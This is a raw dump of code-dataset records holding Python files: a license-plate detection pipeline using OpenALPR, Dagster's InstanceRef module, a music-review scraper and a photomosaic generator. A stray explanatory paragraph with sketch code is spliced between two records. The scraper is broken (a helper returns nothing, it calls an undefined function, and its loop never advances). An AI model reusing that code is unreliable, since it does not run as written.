clipName.format(cam)\n cv2.imwrite(clipName,frm[ymin-5:ymax+5,xmin-5:xmax+5,:])\n response = subprocess.check_output([\"alpr\", \"--config\", \"config/openalpr.conf\", \"-n\", \"1\",\"-c\",\"mx\",\"-p\",\"mx\", clipName]).decode(\"utf-8\")\n print(\"alpr: {}\".format(response))\n if response != \"No license plates found.\\n\":\n response = response.split(\"\\n\")[1:][0].split(\"\\t\")\n plate = response[0].replace(\" - \", \"\")\n confidence = response[1].split(\":\")[1].strip()\n is_match = response[2].split(\":\")[1].strip()\n if is_match == \"1\":\n self.state[cam][\"plates\"].append(plate)\n best = {}\n print(\"PLATES: {}\".format(self.state[cam]))\n for p in self.state[cam][\"plates\"]:\n cnt = getWithDefault(best,p,0)\n best[p] = cnt + 1\n if best[p] > 1:\n self.state[cam][\"plate\"] = p\n print(\"BEST: {}\".format(best))\n #cv2.putText(img_disp,plate,(xmin_s,int(ymin-12/scale)),\n #cv2.FONT_HERSHEY_SIMPLEX, 1,(0,255,0),2,cv2.LINE_AA)\n #print(\"[{}] {}\".format(plate,confidence))\n if not trailer_present:\n self.state[cam]={\"plate\":\"unknown\",\"plates\":[]}\n result[\"plate\"] = self.state[cam][\"plate\"]\n print(\"PUTTING {}\".format(result))\n self.outQ.put((self.name,cam,result,frm,True))\n else:\n self.outQ.put((self.name,predecesor,{\"name\":self.name,\"predecesor\":predecesor,\"error\":\"Finished\"},None,False))\n\n\n\n self.outQ.put((self.name,None,None,None,False))\n self.running = False\n self.thr = None\n return self\n\n def status(self):\n if not self.running and self.thr==None:\n return \"stopped\"\n elif not self.running:\n return \"stopping\"\n else:\n return \"running\"\n\n\n\n\n\nclass SSD7PredictorWithPlate:\n def __init__ (\n self,\n idPredictor,\n model_path,\n img_height = 300,\n img_width = 480,\n img_channels = 3,\n intensity_mean = 127.5,\n intensity_range = 127.5,\n n_classes = 5,\n scales = [0.08, 0.16, 0.32, 0.64, 0.96],\n aspect_ratios = [0.5, 1.0, 2.0],\n two_boxes_for_ar1 = True,\n steps = None,\n offsets = None,\n clip_boxes = False,\n variances = [1.0, 1.0, 1.0, 1.0],\n normalize_coords = True,\n class_threshold=None,\n confidence_thresh=0.15, #0.25,\n iou_threshold= 0.05, #0.15, #0.45,\n top_k=10):\n\n self.ssd_predictor = SSD7Predictor(\n idPredictor,\n model_path,\n img_height = img_height,\n img_width = img_width,\n img_channels = img_channels,\n intensity_mean = intensity_mean,\n intensity_range = intensity_range,\n n_classes = n_classes,\n scales = scales,\n aspect_ratios = aspect_ratios,\n two_boxes_for_ar1 = two_boxes_for_ar1,\n steps = steps,\n offsets = offsets,\n clip_boxes = clip_boxes,\n variances = variances,\n normalize_coords = normalize_coords,\n class_threshold=class_threshold,\n confidence_thresh=confidence_thresh, #0.25,\n iou_threshold= iou_threshold, #0.15, #0.45,\n top_k=top_k)\n self.id = str(idPredictor)\n # the plates vector holds readings; we keep trying\n # until we gather 5 identical readings\n self.plates = []\n self.plate = \"unknown\"\n\n\n\n def predict(self,camera,frm,idFrame):\n ssd_preds,height,width = self.ssd_predictor.predict(camera,frm,idFrame)\n # check whether we still have no plate but a plate (class 5) is in y_pred\n # if so, invoke alpr to see whether we can read the plate (5 times)\n clip_name = \"data/images/clip-{}.jpg\".format(camera)\n print(\"ssd_preds: {}\".format(ssd_preds))\n trailer_present = False\n for pred in ssd_preds:\n print(\"HAS: {}\".format(pred[0]))\n if pred[0] == 2:\n print(\"TRAILER PRESENT!\")\n trailer_present = True\n if pred[0] == 5 and self.plate == \"unknown\":\n print(\"HAS PLATE: {}\".format(pred))\n xmin = pred[2]\n ymin = pred[3]\n xmax = pred[4]\n ymax = pred[5]\n\n cv2.imwrite(clip_name,frm[ymin-5:ymax+5,xmin-5:xmax+5,:])\n for k in range(0,30):\n cv2.imwrite(clip_name+str(k)+\".jpg\",frm[ymin-k:ymax+k,xmin-k:xmax+k,:])\n response = subprocess.check_output([\"alpr\", \"--config\", \"config/openalpr.conf\", \"-n\", \"1\",\"-c\",\"mx\",\"-p\",\"mx\", clip_name]).decode(\"utf-8\")\n print(\"alpr: {}\".format(response))\n if response != \"No license plates found.\\n\":\n response = response.split(\"\\n\")[1:][0].split(\"\\t\")\n plate = response[0].replace(\" - \", \"\")\n confidence = response[1].split(\":\")[1].strip()\n is_match = response[2].split(\":\")[1].strip()\n if is_match == \"1\":\n self.plates.append(plate)\n best = {}\n print(\"PLATES: {}\".format(self.plates))\n for p in self.plates:\n cnt = getWithDefault(best,p,0)\n best[p] = cnt + 1\n if best[p] > 1:\n self.plate = p\n print(\"BEST: {}\".format(best))\n #cv2.putText(img_disp,plate,(xmin_s,int(ymin-12/scale)),\n #cv2.FONT_HERSHEY_SIMPLEX, 1,(0,255,0),2,cv2.LINE_AA)\n #print(\"[{}] {}\".format(plate,confidence))\n else:\n print(response)\n if trailer_present == False:\n print(\"NO TRAILER\")\n self.plates=[]\n self.plate = \"unknown\"\n return (ssd_preds,height,width,self.plate)\n\n\ndef buildPredictors(models,predictorsConf):\n predictors = {}\n for conf in predictorsConf:\n model = SSD7Model(conf[\"modelName\"],conf[\"weightsPath\"])\n models[model.getName()] = model\n\n return models\n\n\n\ndef buildPredictors(models,queues,predictorsConf):\n predictors = {}\n for conf in predictorsConf:\n if getWithDefault(conf,\"activate\",1):\n if conf[\"type\"]==\"ssd7\":\n model = models[conf[\"model\"]]\n predictor = SSD7Predictor(\n conf[\"name\"],\n model,\n queues[conf[\"qIn\"]],\n queues[conf[\"qOut\"]],\n img_height=getWithDefault(conf,\"img_height\",270),\n img_width=getWithDefault(conf,\"img_width\",480),\n class_threshold=getWithDefault(conf,\"class_threshold\",None)\n )\n else:\n predictor = ALPRPredictor(\n conf[\"name\"],\n conf[\"clipsPath\"],\n queues[conf[\"qIn\"]],\n queues[conf[\"qOut\"]]\n )\n predictors[conf[\"name\"]] = predictor\n print(\"GOT THE CONTROL\")\n predictor.start()\n\n return predictors\n", "sub_path": "src/py/Predictor.py", "file_name": "Predictor.py", "file_ext": "py", "file_size_in_byte": 14032, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2",
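Both predictor classes in the record above follow the same queue-driven worker pattern: start() spins up a single daemon thread, _run() blocks on the input queue and pushes tagged results to the output queue, and stop() flips the running flag and joins. A minimal, self-contained sketch of that life cycle follows; the names (QueueWorker, in_q, out_q) are illustrative and not part of Predictor.py:

```python
from queue import Queue
from threading import Thread

class QueueWorker:
    """Minimal sketch of the start/_run/stop life cycle used by the predictors above."""

    def __init__(self, name, in_q, out_q):
        self.name = name
        self.in_q = in_q
        self.out_q = out_q
        self.running = False
        self.thr = None

    def start(self):
        # Create the helper thread only once; daemon=True lets it die with the process.
        if not self.running and self.thr is None:
            self.thr = Thread(name=self.name + ".helper", target=self._run, daemon=True)
            self.running = True
            self.thr.start()
        return self

    def _run(self):
        while self.running:
            item = self.in_q.get()             # blocks until work arrives
            self.out_q.put((self.name, item))  # results are tagged with the worker name

    def stop(self):
        if self.running:
            self.running = False
            self.thr.join(1)
        return self

if __name__ == "__main__":
    in_q, out_q = Queue(), Queue()
    worker = QueueWorker("ssd7", in_q, out_q).start()
    in_q.put("frame-1")
    print(out_q.get())  # ('ssd7', 'frame-1')
    worker.stop()
```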
"pt": "13", "api": [{"api_name": "cv2.resize", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 66, "usage_type": "call"}, {"api_name": "ssd_encoder_decoder.ssd_output_decoder.decode_detections", "line_number": 70, "usage_type": "call"}, {"api_name": "keras.backend.get_session", "line_number": 90, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 90, "usage_type": "name"}, {"api_name": "tensorflow.get_default_graph", "line_number": 91, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 99, "usage_type": "call"}, {"api_name": "keras.backend.get_session", "line_number": 146, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 146, "usage_type": "name"}, {"api_name": "tensorflow.get_default_graph", "line_number": 147, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 155, "usage_type": "call"}, {"api_name": "utils.generic.getWithDefault", "line_number": 171, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 186, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 187, "usage_type": "call"}, {"api_name": "utils.generic.getWithDefault", "line_number": 199, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 306, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 308, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 309, "usage_type": "call"}, {"api_name": "utils.generic.getWithDefault", "line_number": 321, "usage_type": "call"}, {"api_name": "utils.generic.getWithDefault", "line_number": 351, "usage_type": "call"}, {"api_name": "utils.generic.getWithDefault", "line_number": 359, "usage_type": "call"}, {"api_name": "utils.generic.getWithDefault", "line_number": 360, "usage_type": "call"}, {"api_name": "utils.generic.getWithDefault", "line_number": 361, "usage_type": "call"}]} +{"seq_id": "66903521", "text": "import os\nfrom collections import namedtuple\n\nimport yaml\n\nfrom dagster import check\nfrom dagster.serdes import ConfigurableClassData, whitelist_for_serdes\n\nfrom .config import DAGSTER_CONFIG_YAML_FILENAME, dagster_instance_config\n\n\ndef _runs_directory(base):\n return os.path.join(base, 'history', '')\n\n\ndef compute_logs_directory(base):\n return os.path.join(base, 'storage')\n\n\ndef _event_logs_directory(base):\n return os.path.join(base, 'history', 'runs', '')\n\n\ndef _schedule_directory(base):\n return os.path.join(base, 'schedules')\n\n\ndef configurable_class_data_or_default(config_value, field_name, default):\n if config_value.get(field_name):\n return ConfigurableClassData(\n config_value[field_name]['module'],\n config_value[field_name]['class'],\n yaml.dump(config_value[field_name].get('config') or {}, default_flow_style=False),\n )\n return default\n\n\n@whitelist_for_serdes\nclass InstanceRef(\n namedtuple(\n '_InstanceRef',\n 'local_artifact_storage_data run_storage_data event_storage_data compute_logs_data '\n 'schedule_storage_data scheduler_data run_launcher_data settings',\n )\n):\n '''Serializable representation of a :py:class:`DagsterInstance`.\n\n Users should not instantiate this class directly.\n '''\n\n def __new__(\n cls,\n local_artifact_storage_data,\n run_storage_data,\n event_storage_data,\n compute_logs_data,\n schedule_storage_data,\n scheduler_data,\n run_launcher_data,\n settings,\n 
):\n return super(cls, InstanceRef).__new__(\n cls,\n local_artifact_storage_data=check.inst_param(\n local_artifact_storage_data, 'local_artifact_storage_data', ConfigurableClassData\n ),\n run_storage_data=check.inst_param(\n run_storage_data, 'run_storage_data', ConfigurableClassData\n ),\n event_storage_data=check.inst_param(\n event_storage_data, 'event_storage_data', ConfigurableClassData\n ),\n compute_logs_data=check.inst_param(\n compute_logs_data, 'compute_logs_data', ConfigurableClassData\n ),\n schedule_storage_data=check.opt_inst_param(\n schedule_storage_data, 'schedule_storage_data', ConfigurableClassData\n ),\n scheduler_data=check.opt_inst_param(\n scheduler_data, 'scheduler_data', ConfigurableClassData\n ),\n run_launcher_data=check.opt_inst_param(\n run_launcher_data, 'run_launcher_data', ConfigurableClassData\n ),\n settings=check.opt_dict_param(settings, 'settings'),\n )\n\n @staticmethod\n def from_dir(base_dir, config_filename=DAGSTER_CONFIG_YAML_FILENAME, overrides=None):\n overrides = check.opt_dict_param(overrides, 'overrides')\n config_value = dagster_instance_config(\n base_dir, config_filename=config_filename, overrides=overrides\n )\n\n local_artifact_storage_data = configurable_class_data_or_default(\n config_value,\n 'local_artifact_storage',\n ConfigurableClassData(\n 'dagster.core.storage.root',\n 'LocalArtifactStorage',\n yaml.dump({'base_dir': base_dir}, default_flow_style=False),\n ),\n )\n\n run_storage_data = configurable_class_data_or_default(\n config_value,\n 'run_storage',\n ConfigurableClassData(\n 'dagster.core.storage.runs',\n 'SqliteRunStorage',\n yaml.dump({'base_dir': _runs_directory(base_dir)}, default_flow_style=False),\n ),\n )\n\n event_storage_data = configurable_class_data_or_default(\n config_value,\n 'event_log_storage',\n ConfigurableClassData(\n 'dagster.core.storage.event_log',\n 'SqliteEventLogStorage',\n yaml.dump({'base_dir': _event_logs_directory(base_dir)}, default_flow_style=False),\n ),\n )\n\n compute_logs_data = configurable_class_data_or_default(\n config_value,\n 'compute_logs',\n ConfigurableClassData(\n 'dagster.core.storage.local_compute_log_manager',\n 'LocalComputeLogManager',\n yaml.dump({'base_dir': compute_logs_directory(base_dir)}, default_flow_style=False),\n ),\n )\n\n schedule_storage_data = configurable_class_data_or_default(\n config_value,\n 'schedule_storage',\n ConfigurableClassData(\n 'dagster.core.storage.schedules',\n 'SqliteScheduleStorage',\n yaml.dump({'base_dir': _schedule_directory(base_dir)}, default_flow_style=False),\n ),\n )\n\n scheduler_data = configurable_class_data_or_default(config_value, 'scheduler', None)\n run_launcher_data = configurable_class_data_or_default(\n config_value,\n 'run_launcher',\n ConfigurableClassData('dagster', 'DefaultRunLauncher', yaml.dump({}),),\n )\n\n settings_keys = {'telemetry', 'opt_in'}\n settings = {key: config_value.get(key) for key in settings_keys}\n\n return InstanceRef(\n local_artifact_storage_data=local_artifact_storage_data,\n run_storage_data=run_storage_data,\n event_storage_data=event_storage_data,\n compute_logs_data=compute_logs_data,\n schedule_storage_data=schedule_storage_data,\n scheduler_data=scheduler_data,\n run_launcher_data=run_launcher_data,\n settings=settings,\n )\n\n @staticmethod\n def from_dict(instance_ref_dict):\n def value_for_ref_item(k, v):\n if v is None:\n return None\n if k == 'settings':\n return v\n return ConfigurableClassData(*v)\n\n return InstanceRef(**{k: value_for_ref_item(k, v) for k, v in 
instance_ref_dict.items()})\n\n @property\n def local_artifact_storage(self):\n return self.local_artifact_storage_data.rehydrate()\n\n @property\n def run_storage(self):\n return self.run_storage_data.rehydrate()\n\n @property\n def event_storage(self):\n return self.event_storage_data.rehydrate()\n\n @property\n def compute_log_manager(self):\n return self.compute_logs_data.rehydrate()\n\n @property\n def schedule_storage(self):\n return self.schedule_storage_data.rehydrate() if self.schedule_storage_data else None\n\n @property\n def scheduler(self):\n return self.scheduler_data.rehydrate() if self.scheduler_data else None\n\n @property\n def run_launcher(self):\n return self.run_launcher_data.rehydrate() if self.run_launcher_data else None\n\n def to_dict(self):\n return self._asdict()\n", "sub_path": "python_modules/dagster/dagster/core/instance/ref.py", "file_name": "ref.py", "file_ext": "py", "file_size_in_byte": 6953, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 30, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 33, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 40, "usage_type": "call"}, {"api_name": "dagster.check.inst_param", "line_number": 64, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 65, "usage_type": "argument"}, {"api_name": "dagster.check", "line_number": 64, "usage_type": "name"}, {"api_name": "dagster.check.inst_param", "line_number": 67, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 68, "usage_type": "argument"}, {"api_name": "dagster.check", "line_number": 67, "usage_type": "name"}, {"api_name": "dagster.check.inst_param", "line_number": 70, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 71, "usage_type": "argument"}, {"api_name": "dagster.check", "line_number": 70, "usage_type": "name"}, {"api_name": "dagster.check.inst_param", "line_number": 73, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 74, "usage_type": "argument"}, {"api_name": "dagster.check", "line_number": 73, "usage_type": "name"}, {"api_name": "dagster.check.opt_inst_param", "line_number": 76, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 77, "usage_type": "argument"}, {"api_name": "dagster.check", "line_number": 76, "usage_type": "name"}, {"api_name": "dagster.check.opt_inst_param", "line_number": 79, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 80, "usage_type": "argument"}, {"api_name": "dagster.check", "line_number": 79, "usage_type": "name"}, {"api_name": "dagster.check.opt_inst_param", "line_number": 82, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 83, 
"usage_type": "argument"}, {"api_name": "dagster.check", "line_number": 82, "usage_type": "name"}, {"api_name": "dagster.check.opt_dict_param", "line_number": 85, "usage_type": "call"}, {"api_name": "dagster.check", "line_number": 85, "usage_type": "name"}, {"api_name": "config.DAGSTER_CONFIG_YAML_FILENAME", "line_number": 89, "usage_type": "name"}, {"api_name": "dagster.check.opt_dict_param", "line_number": 90, "usage_type": "call"}, {"api_name": "dagster.check", "line_number": 90, "usage_type": "name"}, {"api_name": "config.dagster_instance_config", "line_number": 91, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 98, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 101, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 108, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 111, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 118, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 121, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 128, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 131, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 138, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 141, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 149, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 149, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 173, "usage_type": "call"}, {"api_name": "dagster.serdes.whitelist_for_serdes", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "337346345", "text": "from music_grapher.models import Band, Album, Reviews, BandSearch\n\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport re\nimport time\nimport requests\nimport math\n\ndef openPage(page):\n headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5)'}\n urllibpage = requests.get(page, headers=headers)\n soup = BeautifulSoup(urllibpage.text, \"html.parser\")\n\ndef getLastBand():\n x = Band.objects.latest('band_id')\n return x.band_id+1\n\ndef getBandData(soup, band_fk):\n albumContainer = soup.find('div', {\"class\" : \"facetContent\"})\n albumList = albumContainer.findChildren()\n for row in albumList: #for each album found\n #Is not a subheadline, needs to be split again\n album = {\n \"album_year\": 0,\n \"album_link\": \"X\",\n \"album_title\": \"X\",\n \"album_type\": \"X\",\n \"critic_score\": 0,\n \"user_score\": 0,\n }\n\n datarow = row.findChildren()\n for data in datarow: #for each album find data\n if data.has_attr(\"class\") and data.get(\"class\")[0] == \"date\" and \"album_year\" not in album:\n album[\"album_year\"] = int(data.text)\n if data.has_attr(\"href\") and \"album_link\" not in album:\n album[\"album_link\"] = \"http://www.albumoftheyear.org\" + data.get('href')\n if data.has_attr(\"class\") and data.get(\"class\")[0] == \"albumTitle\" and \"album_title\" not in album:\n album[\"album_title\"] = data.text\n #if data.has_attr(\"class\") and data[\"class\"][0] == \"type\" and \"album_type\" not in album:\n if data.has_attr(\"class\") and data.get(\"class\")[0] == \"type\" and \"album_type\" not in album:\n album[\"album_type\"] = data.text\n if data.has_attr(\"class\") and data.get(\"class\")[0] == 'ratingRowContainer':\n ratingdiv = data.findChildren()\n for rating 
in ratingdiv:\n if \"critic score\" in rating.text and \"\\n\" in rating.text and \"critic_score\" not in album:\n album[\"critic_score\"] = int(rating.find(\"div\", {\"class\": \"rating\"}).text)\n album[\"no_critic_reviews\"] = rating.findAll(\"div\", {\"class\": \"ratingText\"})[-1].text\n if \"user score\" in rating.text and \"\\n\" in rating.text and \"user_score\" not in album:\n album[\"user_score\"] = int(rating.find(\"div\", {\"class\": \"rating\"}).text)\n album[\"no_user_reviews\"] = rating.findAll(\"div\", {\"class\": \"ratingText\"})[-1].text\n #If data is complete, insert to DB\n if all([item in album for item in [\"album_year\", \"album_link\", \"album_title\"]]):\n if album[\"critic_score\"] + album[\"user_score\"] != 0:\n if Album.objects.filter(album_link = album['album_link']).count() == 0:\n #Enter data\n Album.objects.create(band_id=band_fk,\n album_name = album['album_title'],\n album_link = album['album_link'],\n critic_score_avg = album['critic_score'],\n user_score_avg = album['user_score'],\n date = album['album_year'])\n\nif __name__ == \"__main__\":\n i = getLast()\n while i < 3000:#40000:\n url = 'https://www.albumoftheyear.org/artist/' + str(id) + '/'\n band_soup = openPage(url)\n getBandData(band_soup, i)\n\n", "sub_path": "get_data.py", "file_name": "get_data.py", "file_ext": "py", "file_size_in_byte": 3512, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}, {"api_name": "music_grapher.models.Band.objects.latest", "line_number": 16, "usage_type": "call"}, {"api_name": "music_grapher.models.Band.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "music_grapher.models.Band", "line_number": 16, "usage_type": "name"}, {"api_name": "music_grapher.models.Album.objects.filter", "line_number": 56, "usage_type": "call"}, {"api_name": "music_grapher.models.Album.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "music_grapher.models.Album", "line_number": 56, "usage_type": "name"}, {"api_name": "music_grapher.models.Album.objects.create", "line_number": 58, "usage_type": "call"}, {"api_name": "music_grapher.models.Album.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "music_grapher.models.Album", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "504073347", "text": "import os\nfrom PIL import Image\nimport argparse\n\n\ndef getImages(imageDir):\n \"\"\"\n 从小块图像目录中读取图像\n :param imageDir: 目录路径\n :return: 小块图像列表\n \"\"\"\n files = os.listdir(imageDir)\n images = []\n for file in files:\n # os.path.join将目录名和文件名合成一个路径\n # os.path.abspath获取文件的绝对路径\n filePath = os.path.abspath(os.path.join(imageDir, file))\n with open(filePath, \"rb\") as f:\n im = Image.open(f)\n images.append(im)\n # 真实的图像数据直到试图处理该数据才会从文件读取(调用load()方法将强行加载图像数据)。\n im.load()\n return images\n\n\ndef getAverageRGB(image):\n \"\"\"\n 计算图像的RGB平均值\n 每个像素点的RGB值分别累加除以像素点数量\n :param image: Image对象\n :return: 返回平均值\n \"\"\"\n # 像素点数\n pixels = image.size[0] * image.size[1]\n Rlist = list()\n Glist = list()\n Blist = list()\n avg = list()\n for i in range(image.size[0]):\n for j in range(image.size[1]):\n r, g, b = image.getpixel((i, j))\n Rlist.append(r)\n Glist.append(g)\n Blist.append(b)\n # avg_r = sum(Rlist)/pixels\n # avg_g = sum(Glist)/pixels\n # avg_b = sum(Blist)/pixels\n # 每个像素点的r值总和除以像素点数\n avg.append(int(sum(Rlist)/pixels))\n 
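The per-pixel loops in getAverageRGB above are easy to follow but slow for large tiles, since every pixel is fetched through Python. Pillow's ImageStat module computes the same per-band means in C; a sketch of an equivalent helper, not part of the original script:

```python
from PIL import Image, ImageStat

def average_rgb(image):
    # Stat.mean holds one float per band, e.g. [R, G, B] for an RGB image,
    # matching the [avg_r, avg_g, avg_b] list built manually above.
    stat = ImageStat.Stat(image.convert("RGB"))
    return [int(v) for v in stat.mean]
```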
avg.append(int(sum(Glist)/pixels))\n avg.append(int(sum(Blist)/pixels))\n return avg\n\n # npixels = image.size[0] * image.size[1]\n # cols = image.getcolors(npixels)\n # sumRGB = [(x[0] * x[1][0], x[0] * x[1][1], x[0] * x[1][2]) for x in cols]\n # avg = tuple([int(sum(x) / npixels) for x in zip(*sumRGB)])\n # return avg\n\n\ndef splitimage(image, size):\n \"\"\"\n Split the image into multiple small images along a grid\n :param image: Image object\n :param size: number of columns and rows of the grid\n :return: list of small images\n \"\"\"\n # width and height of the image\n W, H = image.size\n # rows and columns; rows correspond to height, columns to width\n x, y = size\n # get the width and height of each small image\n w, h = int(W/y), int(H/x)\n imgs = []\n # extract the small image in each column, row by row\n for j in range(x):\n for i in range(y):\n # crop the image: crop((left, upper, right, lower)); (left, upper) is the top-left corner of the small image and (right, lower) is its bottom-right corner\n imgs.append(image.crop((i*w, j*h, (i+1)*w, (j+1)*h)))\n return imgs\n\n\ndef getBestMatchIndex(input_avg, avgs):\n \"\"\"\n Find the small image whose color value is closest\n Treat a color as a point in 3-D space and find the point in the list closest to the target point\n :param input_avg: target color value\n :param avgs: list of color values to search\n :return: list index of the image with the closest color value\n \"\"\"\n # initial index is 0\n # the list has implicit indices that cannot be listed directly; start from a default index and keep incrementing while iterating\n index = 0\n # index of the hit\n min_index = 0\n # float(\"inf\") is positive infinity, float(\"-inf\") negative infinity\n # set the initial minimum distance to positive infinity\n min_dist = float(\"inf\")\n # iterate over the color value list, index starting at 0\n for val in avgs:\n # distance formula for two points in 3-D space: (x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2)\n # + (z1 - z2) * (z1 - z2); we only compare magnitudes here, so there is no need for the square root\n dist = ((val[0] - input_avg[0]) * (val[0] - input_avg[0]) +\n (val[1] - input_avg[1]) * (val[1] - input_avg[1]) +\n (val[2] - input_avg[2]) * (val[2] - input_avg[2])\n )\n # the first computed value is certainly smaller than infinity; take it as the minimum distance and record its index\n # if a later value is smaller, it becomes the new minimum and its index is recorded\n if dist < min_dist:\n min_dist = dist\n min_index = index\n # increment the index\n index += 1\n # after traversing all elements of the color list, return the index of the closest color value\n return min_index\n\n\ndef createImageGrid(images, dims):\n \"\"\"\n Fill the small images from the list into the big image in row-major order\n :param images: list of small images\n :param dims: number of rows and columns of the big image\n :return: the newly stitched image\n \"\"\"\n # m is the number of rows (height), n the number of columns (width)\n m, n = dims\n # assert that the number of small images matches the number of grid cells of the big image\n assert m * n == len(images)\n # compute the maximum width and height among the small images\n width = max([img.size[0] for img in images])\n height = max([img.size[1] for img in images])\n # use these as the cell width and height and create the new big image\n # if a small image is smaller than the cell, the remainder is filled with the background color (black by default)\n grid_img = Image.new('RGB', (n * width, m * height))\n index = 0\n # # paste the small images one by one in row-major order\n for i in range(m):\n for j in range(n):\n # paste(img, (top-left x coordinate, top-left y coordinate))\n # print(i, j)\n grid_img.paste(images[index], (j * width, i * height))\n # increment the index, filling one image at a time\n index += 1\n # paste each small image into the big image in turn\n # for index in range(len(images)):\n # # compute which grid row to paste into\n # row = int(index / n)\n # # compute which grid column to paste into\n # col = index - n * row\n # # derive the cell's top-left coordinate from the row, column and cell size, and paste the small image there\n # grid_img.paste(images[index], (col * width, row * height))\n return grid_img\n\n\ndef createPhotomosaic(target_image, grid_size, input_imageDir):\n \"\"\"Main routine for generating the photomosaic\"\"\"\n # split the target image into grid tiles\n print(\">>>Splitting target image\")\n with open(target_image, \"rb\") as f:\n content = Image.open(f)\n target_images = splitimage(content, grid_size)\n print(\">>>Reading candidate image list\")\n # read the image list\n input_images = getImages(input_imageDir)\n print(\">>>Averaging colors of candidate images\")\n # compute the average color of every image in the list\n avgs = list()\n for img in input_images:\n avgs.append(getAverageRGB(img))\n print(\">>>Selecting replacement images\")\n # the matched small images form a new list\n output_images = list()\n # compute the average color of each grid tile of the target image\n for img in target_images:\n avg = getAverageRGB(img)\n # compare it with the averages of the image list to find the index of the best image\n match_index = getBestMatchIndex(avg, avgs)\n output_images.append(input_images[match_index])\n print(\">>>Generating new image\")\n # fill the replacement images into the newly created image\n mosaic_image = createImageGrid(output_images, grid_size)\n return 
mosaic_image\n\n\ndef main():\n \"\"\"Main function; receives dynamic command-line arguments\"\"\"\n # define the command-line parser\n parser = argparse.ArgumentParser(description=\"Create a photomosaic from input images\")\n # add the arguments\n parser.add_argument('--target-image', dest='target_image', required=True)\n parser.add_argument('--input-folder', dest='input_folder', required=True)\n parser.add_argument('--grid-size', nargs=2, dest='grid_size', required=True)\n parser.add_argument('--output-file', dest='outfile')\n # parse the command-line arguments\n args = parser.parse_args()\n grid_size = (int(args.grid_size[0]), int(args.grid_size[1]))\n output_filename = 'mosaic.png'\n if args.outfile:\n output_filename = args.outfile\n target_image = args.target_image\n input_imageDir = args.input_folder\n mosaic_image = createPhotomosaic(target_image, grid_size, input_imageDir)\n mosaic_image.save(output_filename, 'PNG')\n print(\"Success!\")\n\n\nif __name__ == '__main__':\n main()", "sub_path": "21_ImageMosaic/test4.py", "file_name": "test4.py", "file_ext": "py", "file_size_in_byte": 8137, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.listdir", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 19, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 19, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 134, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 134, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 160, "usage_type": "call"}, 